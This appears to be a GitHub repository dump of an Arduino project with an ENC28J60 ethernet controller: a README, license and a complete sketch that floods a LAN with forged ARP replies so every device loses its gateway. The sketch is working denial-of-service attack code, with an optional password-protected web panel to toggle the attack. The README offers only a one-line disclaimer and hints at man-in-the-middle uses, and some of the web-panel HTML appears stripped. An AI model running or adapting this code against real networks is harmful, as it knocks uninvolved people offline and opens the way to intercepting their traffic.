├── images ├── 1.jpg ├── 2.jpg ├── 3.jpg └── patreon.png ├── .gitignore ├── LICENSE ├── README.md └── ARPspoofer └── ARPspoofer.ino /images/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/spacehuhn/ArduinoARPspoof/HEAD/images/1.jpg -------------------------------------------------------------------------------- /images/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/spacehuhn/ArduinoARPspoof/HEAD/images/2.jpg -------------------------------------------------------------------------------- /images/3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/spacehuhn/ArduinoARPspoof/HEAD/images/3.jpg -------------------------------------------------------------------------------- /images/patreon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/spacehuhn/ArduinoARPspoof/HEAD/images/patreon.png -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Object files 2 | *.o 3 | *.ko 4 | *.obj 5 | *.elf 6 | 7 | # Precompiled Headers 8 | *.gch 9 | *.pch 10 | 11 | # Libraries 12 | *.lib 13 | *.a 14 | *.la 15 | *.lo 16 | 17 | # Shared objects (inc. Windows DLLs) 18 | *.dll 19 | *.so 20 | *.so.* 21 | *.dylib 22 | 23 | # Executables 24 | *.exe 25 | *.out 26 | *.app 27 | *.i*86 28 | *.x86_64 29 | *.hex 30 | 31 | # Debug files 32 | *.dSYM/ 33 | *.su 34 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Stefan Kremser 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Arduino ARP-Spoof 2 | Kicks out everyone in your LAN with Arduino and an ENC28J60 ethernet controller. 3 | 4 | ![ENC28J60 ethernet shield + Arduino nano plugged in and working](https://raw.githubusercontent.com/spacehuhn/enc28j60_ARPspoofer/master/images/1.jpg) 5 | 6 | **Support me and my projects on [Patreon!](https://www.patreon.com/spacehuhn)** 7 | [ Support me on Patreon

](https://www.patreon.com/spacehuhn) 8 | 9 | 10 | ## Contents 11 | - [Introduction](#introduction) 12 | - [What it is](#what-it-is) 13 | - [How it works](#how-it-works) 14 | - [What an ENC28J60 is](#what-an-enc28j60-is) 15 | - [How to protect against it](#how-to-protect-against-it) 16 | - [Disclaimer](#disclaimer) 17 | - [Installation](#installation) 18 | - [How to use it](#how-to-use-it) 19 | - [License](#license) 20 | - [Sources and additional links](#sources-and-additional-links) 21 | 22 | ## Introduction ## 23 | 24 | 25 | ### What it is 26 | 27 | Using an Arduino with an ethernet controller, this device will perform an [ARP spoofing](https://en.wikipedia.org/wiki/ARP_spoofing) attack to block the communication from every client device in your LAN to the gateway. 28 | 29 | ### How it works 30 | 31 | It will constanly send ARP replies to every device in the LAN and tell them that the gateway is at a random MAC adress. 32 | The gateway is the link between your local network and the internet. By telling everyone it's at an adress that doesn't exist, nobody will be able to communicate to it anymore and by that, lose the connection. 33 | 34 | ### What an ENC28J60 is 35 | 36 | The ENC28J60 is a cheap 10mbit SPI ethernet controller for Arduino. Because it has a very open and easy hackable library, it's perfect for this project and you could even programm a man-in-the-middle attack or other funny stuff with it. 37 | 38 | ![ENC28J60 ethernet shield and an Arduino nano](https://raw.githubusercontent.com/spacehuhn/enc28j60_ARPspoofer/master/images/2.jpg) 39 | 40 | ### How to protect against it 41 | 42 | Use a router, network switch or software that provides you protection against ARP spoofing. 43 | Note: I haven't tested it on such protected hardware yet. 44 | 45 | ## Disclaimer 46 | 47 | **Use it only for testing purposes on your own network!** 48 | 49 | ## Installation 50 | 51 | You will need an Arduino and an ENC28J60. 52 | If you buy an Arduino ethernet shield be sure it **doesn't** use a wiznet controller (e.g. w5100 or w5500), **this project will only work with an ENC28J60!** 53 | 54 | **1. Wire everything up** 55 | 56 | To do this you need to connect both the Arduino and the controller via their SPI pins. If you're unsure how to do this, you can google for the pinout of your Arduino and the ethernet controller. There are different versions of the ENC28J60 out there. I'm using a shield for the Arduino nano. 57 | 58 | **2. Install library** 59 | 60 | You will need to add the ethercard library in Arduino. 61 | Ho to do that is explained here: https://github.com/jcw/ethercard 62 | 63 | **3. [Optional] Change some settings** 64 | 65 | In the beginning of the sketch are a few settings declared that you can change. 66 | ``` 67 | // ===== Settings ===== // 68 | //#define webinterface /* <-- uncomment that if you want to use the webinterface */ 69 | //#define debug /* <-- uncomment that if you want to use get a serial output */ 70 | #define led 13 71 | #define auth_password "ARP" 72 | int packetRate = 20; //packets send per second 73 | static uint8_t mymac[] = { 0xc0, 0xab, 0x03, 0x22, 0x55, 0x99 }; 74 | ``` 75 | 76 | **4. Upload the code** 77 | 78 | Compile & upload the sketch to your Arduino and you are done :) 79 | 80 | 81 | ## How to use it 82 | 83 | Power it over USB and plug in an ethernet cable. 84 | 85 | **Using the WebInterface:** 86 | If you uncommented `webinterface` in the code, the Arduino won't start the attack by itself. 87 | You have to open its website and start the attack manually. 88 | The IP will be printed out in the serial monitor and the default password is `ARP`. 89 | 90 | ![WebInterface](https://raw.githubusercontent.com/spacehuhn/enc28j60_ARPspoofer/master/images/3.jpg) 91 | 92 | ## License 93 | 94 | This project is licensed under the MIT License - see the [license file](LICENSE) for details. 95 | 96 | ## Sources and additional links 97 | 98 | ARP spoofing: https://en.wikipedia.org/wiki/ARP_spoofing 99 | ENC28J60: http://www.microchip.com/wwwproducts/en/en022889 100 | -------------------------------------------------------------------------------- /ARPspoofer/ARPspoofer.ino: -------------------------------------------------------------------------------- 1 | /* 2 | =========================================== 3 | Copyright (c) 2017 Stefan Kremser 4 | github.com/spacehuhn 5 | =========================================== 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | 12 | // ===== Settings ===== // 13 | //#define webinterface /* <-- uncomment that if you want to use the webinterface */ 14 | //#define debug /* <-- uncomment that if you want to get a serial output */ 15 | #define led 13 16 | #define auth_password "ARP" 17 | int packetRate = 20; //packets send per second 18 | static uint8_t mymac[] = { 0xc0, 0xab, 0x03, 0x22, 0x55, 0x99 }; 19 | 20 | #ifdef webinterface 21 | byte Ethernet::buffer[700]; 22 | #else 23 | byte Ethernet::buffer[400]; 24 | #endif 25 | 26 | int arp_count = 0; 27 | unsigned long prevTime = 0; 28 | bool connection = false; 29 | bool toggle_status = false; 30 | bool tmp_status = true; 31 | 32 | //ARP reply packet 33 | uint8_t _data[48] = { 34 | /* 0 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, //destination MAC 35 | /* 6 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, //source MAC 36 | /* 12 */ 0x08, 0x06, //frame type (ARP) 37 | /* 14 */ 0x00, 0x01, //ethernet 38 | /* 16 */ 0x08, 0x00, //ipv4 39 | /* 18 */ 0x06, 0x04, //size, protocol size 40 | /* 20 */ 0x00, 0x02, //opcode (1:request, 2:reply) 41 | /* 22 */ 0x01, 0x01, 0x01, 0x01c, 0x01, 0x01, //source MAC 42 | /* 28 */ 0xc0, 0xa8, 0x02, 0x01, //source IP 43 | /* 32 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, //destination MAC 44 | /* 38 */ 0xFF, 0xFF, 0xFF, 0xFF, //destination IP (255.255.255.255) 45 | }; 46 | 47 | bool sendARP() { 48 | long curTime = millis(); 49 | 50 | if (curTime - prevTime > 1000/packetRate) { 51 | digitalWrite(led, HIGH); 52 | 53 | for (int i = 0; i < 48; i++) ether.buffer[i] = _data[i]; 54 | ether.packetSend(48); 55 | arp_count++; 56 | prevTime = curTime; 57 | 58 | digitalWrite(led, LOW); 59 | 60 | #ifdef debug 61 | Serial.println("ARP PACKET SENT"); 62 | #endif 63 | 64 | return true; 65 | } 66 | 67 | return false; 68 | } 69 | 70 | void _connect() { 71 | if (!ether.dhcpSetup()) { 72 | #ifdef debug 73 | Serial.println("DHCP failed"); 74 | #endif 75 | connection = false; 76 | } else { 77 | #ifdef debug 78 | ether.printIp("My IP: ", ether.myip); 79 | ether.printIp("Netmask: ", ether.netmask); 80 | ether.printIp("GateWay IP: ", ether.gwip); 81 | ether.printIp("DNS IP: ", ether.dnsip); 82 | #endif 83 | 84 | //set gateway IP 85 | for (int i = 0; i < 4; i++) _data[28 + i] = ether.gwip[i]; 86 | 87 | //set fake MAC 88 | for (int i = 0; i < 6; i++) _data[6 + i] = _data[22 + i] = mymac[i]; 89 | 90 | //fill buffer 91 | for (int i = 0; i < 48; i++) ether.buffer[i] = _data[i]; 92 | 93 | connection = true; 94 | } 95 | } 96 | 97 | void setup() { 98 | pinMode(led, OUTPUT); 99 | 100 | #ifdef debug 101 | Serial.begin(115200); 102 | delay(2000); 103 | Serial.println("ready!"); 104 | Serial.println("waiting for LAN connection..."); 105 | #endif 106 | 107 | if (ether.begin(sizeof Ethernet::buffer, mymac) == 0) { 108 | #ifdef debug 109 | Serial.println( "Failed to access Ethernet controller"); 110 | #endif 111 | } 112 | 113 | while (!connection) { 114 | _connect(); 115 | delay(1000); 116 | } 117 | 118 | } 119 | 120 | void loop() { 121 | #ifdef webinterface 122 | 123 | char len = ether.packetReceive(); 124 | char pos = ether.packetLoop(len); 125 | tmp_status = false; 126 | 127 | if (pos) { 128 | boolean password_valid = true; 129 | 130 | // is it a POST request? 131 | if (strstr((char *)Ethernet::buffer + pos, "POST /") != 0) { 132 | 133 | #ifdef debug 134 | Serial.println("New Post Request!"); 135 | #endif 136 | 137 | // search and verify the password 138 | String password = ""; 139 | char* password_position = strstr((char *)Ethernet::buffer + pos, "pwd="); 140 | if (password_position != 0) { 141 | password = String(password_position).substring(4); 142 | 143 | password = password.substring(0,password.indexOf("&O")); 144 | 145 | #ifdef debug 146 | Serial.println("Found password: '" + (String)password + "'"); 147 | #endif 148 | if(password == auth_password) { 149 | #ifdef debug 150 | Serial.println("password correct :)"); 151 | #endif 152 | } else { 153 | #ifdef debug 154 | Serial.println("wrong password! :("); 155 | #endif 156 | password_valid = false; 157 | } 158 | 159 | if(password_valid){ 160 | // OFF command 161 | if (strstr((char *)Ethernet::buffer + pos, "&OFF=") != 0) { 162 | if (toggle_status) { 163 | #ifdef debug 164 | Serial.println("attack: OFF"); 165 | #endif 166 | toggle_status = false; 167 | tmp_status = true; 168 | } 169 | 170 | // ON command 171 | } else if (strstr((char *)Ethernet::buffer + pos, "&ON=") != 0) { 172 | #ifdef debug 173 | Serial.println("attack: ON"); 174 | #endif 175 | toggle_status = true; 176 | tmp_status = true; 177 | } else { 178 | #ifdef debug 179 | Serial.println("unknown command"); 180 | #endif 181 | } 182 | } 183 | } 184 | } else { 185 | tmp_status = true; 186 | } 187 | 188 | // Output HTML page 189 | BufferFiller bfill = ether.tcpOffset(); 190 | 191 | bfill.emit_p(PSTR( 192 | "HTTP/1.0 200 OK\n" 193 | "Content-Type: text/html\n\n" 194 | "" 195 | "" 196 | "" 197 | "ARP Panel" 198 | "" 199 | "" 200 | "" 201 | "

ARP Spoofer - WebPanel

" 202 | "

More info on the GitHub page

" 203 | "

")); 223 | ether.httpServerReply(bfill.position()); 224 | } else { 225 | tmp_status = true; 226 | if (connection && toggle_status && tmp_status) { 227 | sendARP(); 228 | tmp_status = false; 229 | } else { 230 | digitalWrite(13, LOW); // No Connection, turn off STATUS LED 231 | } 232 | } 233 | 234 | #else 235 | if (connection) sendARP(); 236 | else digitalWrite(led, LOW); //No Connection, turn off STATUS LED 237 | #endif 238 | } 239 | 240 | --------------------------------------------------------------------------------